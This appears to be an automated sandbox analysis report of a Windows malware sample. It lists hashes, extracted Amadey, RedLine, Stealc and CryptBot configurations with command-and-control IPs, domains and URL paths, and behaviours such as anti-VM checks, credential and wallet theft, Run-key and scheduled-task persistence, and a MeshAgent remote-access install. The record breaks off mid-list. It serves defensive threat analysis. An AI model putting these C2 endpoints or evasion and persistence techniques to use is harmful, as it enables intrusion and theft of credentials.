Analysis
-
max time kernel
127s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
21-09-2024 14:25
Static task
static1
Behavioral task
behavioral1
Sample
64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe
Resource
win10v2004-20240802-en
General
-
Target
64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe
-
Size
1.8MB
-
MD5
c870d398c91b01ac088bc903e4ff7461
-
SHA1
906013f31a6b70ec92139523d298fa7fd60854ba
-
SHA256
64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808
-
SHA512
4ca56a3e13f1f6be8128169b2146a134d0a5aa5d428bcee402ffffb50e95e5a1fc331a29ed15a4ca533b3b5bf60edb4b65eefbc6e51d09eb46e95a1447f3c23b
-
SSDEEP
49152:WgrlfDqtlNlJ5u/zGOv/9wts4IWfMtNvp4sv:WI7qzQyts6MTR4
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
redline
LiveTraffic
95.179.250.45:26212
Extracted
redline
@OLEH_PSP
65.21.18.51:45580
Extracted
stealc
default2
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Extracted
redline
bundle
185.215.113.67:15206
Extracted
stealc
default
http://91.202.233.158
-
url_path
/e96ea2db21fa9a1b.php
Extracted
redline
TG CLOUD @RLREBORN Admin @FATHEROFCARDERS
89.105.223.196:29862
Extracted
amadey
4.41
1176f2
http://185.215.113.19
-
install_dir
417fd29867
-
install_file
ednfoki.exe
-
strings_key
183201dc3defc4394182b4bff63c4065
-
url_paths
/CoreOPT/index.php
Extracted
cryptbot
analforeverlovyu.top
thirtvf13pt.top
-
url_path
/v1/upload.php
Signatures
-
Detects ZharkBot payload 3 IoCs
ZharkBot is a botnet written C++.
resource yara_rule behavioral1/memory/3336-372-0x0000000000700000-0x0000000000754000-memory.dmp zharkcore behavioral1/memory/3336-369-0x0000000000700000-0x0000000000754000-memory.dmp zharkcore behavioral1/memory/3336-367-0x0000000000700000-0x0000000000754000-memory.dmp zharkcore -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
resource yara_rule behavioral1/memory/4556-45-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral1/files/0x000800000002346d-105.dat family_redline behavioral1/memory/4368-113-0x0000000000F50000-0x0000000000FA2000-memory.dmp family_redline behavioral1/files/0x0007000000023498-272.dat family_redline behavioral1/memory/4408-286-0x00000000008F0000-0x0000000000942000-memory.dmp family_redline behavioral1/memory/4572-476-0x0000000000400000-0x0000000000452000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4428 created 3428 4428 Waters.pif 56 PID 4428 created 3428 4428 Waters.pif 56 -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 5684 powershell.exe 3300 powershell.EXE 4708 powershell.exe 5928 powershell.exe 2188 powershell.exe 3288 powershell.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " meshagent32-group.exe -
Checks BIOS information in registry 2 TTPs 9 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation crypteda.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation Nework.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation splwow64.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation Waters.pif -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url cmd.exe -
Executes dropped EXE 34 IoCs
pid Process 3880 axplong.exe 380 gold.exe 832 crypteda.exe 2524 D9qjU3T0tH.exe 4368 M4ceNWFoxe.exe 64 Nework.exe 400 Hkbsse.exe 2300 stealc_default2.exe 4804 needmoney.exe 2988 penis.exe 4408 bundle.exe 4980 svchost015.exe 2936 acentric.exe 1716 2.exe 1988 splwow64.exe 2136 crypted.exe 3984 385121.exe 888 Install.exe 5088 Install.exe 4428 Waters.pif 4036 axplong.exe 1584 Hkbsse.exe 660 Installeraus.exe 412 meshagent32-group.exe 2320 MeshAgent.exe 5916 66ed8969a40d8_15_20240920173635.exe 6088 MeshAgent.exe 5128 Install.exe 4956 axplong.exe 5464 channel3.exe 1212 MeshAgent.exe 3256 MeshAgent.exe 5756 VMfZdiW.exe 4184 MeshAgent.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Wine 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Wine axplong.exe -
Indirect Command Execution 1 TTPs 17 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 3716 forfiles.exe 5580 forfiles.exe 5624 forfiles.exe 728 forfiles.exe 5216 forfiles.exe 1520 forfiles.exe 4308 forfiles.exe 4948 forfiles.exe 3084 forfiles.exe 5420 forfiles.exe 924 forfiles.exe 1212 forfiles.exe 4564 forfiles.exe 2360 forfiles.exe 5444 forfiles.exe 2920 forfiles.exe 5540 forfiles.exe -
Loads dropped DLL 3 IoCs
pid Process 1716 2.exe 2300 stealc_default2.exe 2300 stealc_default2.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\splwow64.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000287001\\splwow64.exe" axplong.exe Set value (str) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\acentric = "\"C:\\Users\\Admin\\Pictures\\Opportunistic Telegraph\\acentric.exe\" /update" acentric.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 179 api64.ipify.org 180 api64.ipify.org 181 ipinfo.io 182 ipinfo.io -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\695EB6BB7D52BE5411AEF090F78AC981ED62C7E0 MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\exe\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\combase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\exe\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shcore.pdb MeshAgent.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\apphelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\bcrypt.pdb MeshAgent.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3120 tasklist.exe 4084 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2560 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe 3880 axplong.exe 4036 axplong.exe 4956 axplong.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 380 set thread context of 4556 380 gold.exe 88 PID 4804 set thread context of 4980 4804 needmoney.exe 108 PID 1716 set thread context of 3336 1716 2.exe 112 PID 2136 set thread context of 4572 2136 crypted.exe 123 PID 5916 set thread context of 5240 5916 66ed8969a40d8_15_20240920173635.exe 370 -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\Mesh Agent\MeshAgent.msh MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files (x86)\KworwGpsU\wUzxXa.dll VMfZdiW.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.exe meshagent32-group.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\ViewpictureKingdom splwow64.exe File opened for modification C:\Windows\BrandonBlind splwow64.exe File opened for modification C:\Windows\IpaqArthur splwow64.exe File created C:\Windows\Tasks\bMRcrYTbxyvtsWXpEp.job schtasks.exe File created C:\Windows\Tasks\ECzxLUloJBwCJADCK.job schtasks.exe File created C:\Windows\Tasks\axplong.job 64c7443ad4c3ebfb90a246256618a16b9ddb36c43ff45bc86408823c5c6ff808.exe File created C:\Windows\Tasks\Hkbsse.job Nework.exe File opened for modification C:\Windows\HardlyAircraft splwow64.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 3684 3336 WerFault.exe 112 1340 5128 WerFault.exe 215 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language M4ceNWFoxe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hkbsse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stealc_default2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language splwow64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VMfZdiW.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bundle.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 channel3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString channel3.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f171a6e7-0000-0000-0000-d01200000000}\NukeOnDelete = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133714024008958952" MeshAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created 